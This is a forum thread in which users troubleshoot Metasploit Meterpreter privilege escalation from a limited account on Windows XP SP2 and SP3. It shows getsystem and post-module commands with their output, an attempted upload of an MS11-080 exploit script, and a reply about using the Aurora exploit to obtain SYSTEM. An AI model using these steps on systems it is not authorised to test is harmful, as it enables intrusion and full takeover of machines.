Admin/system Level Escalation For Windows Xp Via Meterpreter

[bobbyb1980]

Greetings fellow hackers. I am trying to figure out a way to open a meterpreter shell on a victim machine that is running a Windows XP limited user account. Getsystem and use priv only seem to be working for escalation from Admin to system, but I am trying to go from limited user to admin.

I was using the uacbypass module for windows 7 limited user accounts, but can't find anything similar for XP.

Any ideas?

[bobbyb1980]

The target is SP2.

[bobbyb1980]

To my knowledge getsystem will only get you system level privs if you already have Admin privs, it's not working to escalate a limited user account to Admin/Sys.

[hexophrenic]

To my knowledge getsystem will only get you system level privs if you already have Admin privs, it's not working to escalate a limited user account to Admin/Sys.

You are mostly right in that getsystem will typically get you system level privs, but then you can use incognito or migrate processes to obtain other user rights. However, on XP SP2 getsystem should work from any meterpreter session, at least it always has for me. I wish I could help more, but it sounds like a module is not working quite right for you. Are you running in trunk? Did you do a an msfupdate?

[bobbyb1980]

Hey guys. Looks like only SP2 is vulnerable to this module. I tried several different modules and none of them work in SP3.

Does anyone know a way to elevate a limited user account to either Admin/SYS in SP3?

meterpreter > getuid
Server username: testinglimited\limited
meterpreter > 

meterpreter > run post/windows/escalate/getsystem

[-] Post failed: Rex::Post::Meterpreter::RequestError priv_elevate_getsystem: Operation failed: Access is denied.
[-] Call stack:
[-]   /opt/framework-4.0.0/msf3/lib/rex/post/meterpreter/extensions/priv/priv.rb:68:in `getsystem'
[-]   /opt/framework-4.0.0/msf3/modules/post/windows/escalate/getsystem.rb:59:in `run'

meterpreter > run post/windows/escalate/ms10_092_schelevator

[-] Windows XP (Build 2600, Service Pack 3). is not vulnerable.

[bobbyb1980]

I found this Python script that will respawn a system/admin shell from a XP SP3 limited user account. I already have a meterpreter shell on the box. Goal is to get from limited user to admin/sys.

http://www.exploit-db.com/exploits/18176/

The problem is, that I can't upload files via a meterpreter limited access shell.

meterpreter > upload /tmp/ms11_080.py C:\\
[*] uploading  : /tmp/ms11_080.py -> C:\
[-] core_channel_open: Operation failed: Access is denied.

Any ideas?

[hexophrenic]

Why not just "use privs" then "getsystem" at the prompt? What happens then?

[bobbyb1980]

I've already posted the output. Doesn't work in SP3.

[hexophrenic]

Don't know what else to tell you.

I just fired up XP SP3 (I also know these work in SP2), ran the aurora exploit against it (ms10_002_aurora):

meterpreter > getuid

Server username: computer\user

meterpreter > getsystem

...got system (via technique 4).

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

Then I tried your method, using the module getsystem.rb explicitly and same thing more or less.

meterpreter > getuid

Server username: computer\user

meterpreter > run post/windows/escalate/getsystem

[+] Obtained SYSTEM via technique 4

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

Which exploit are you using? Which payload?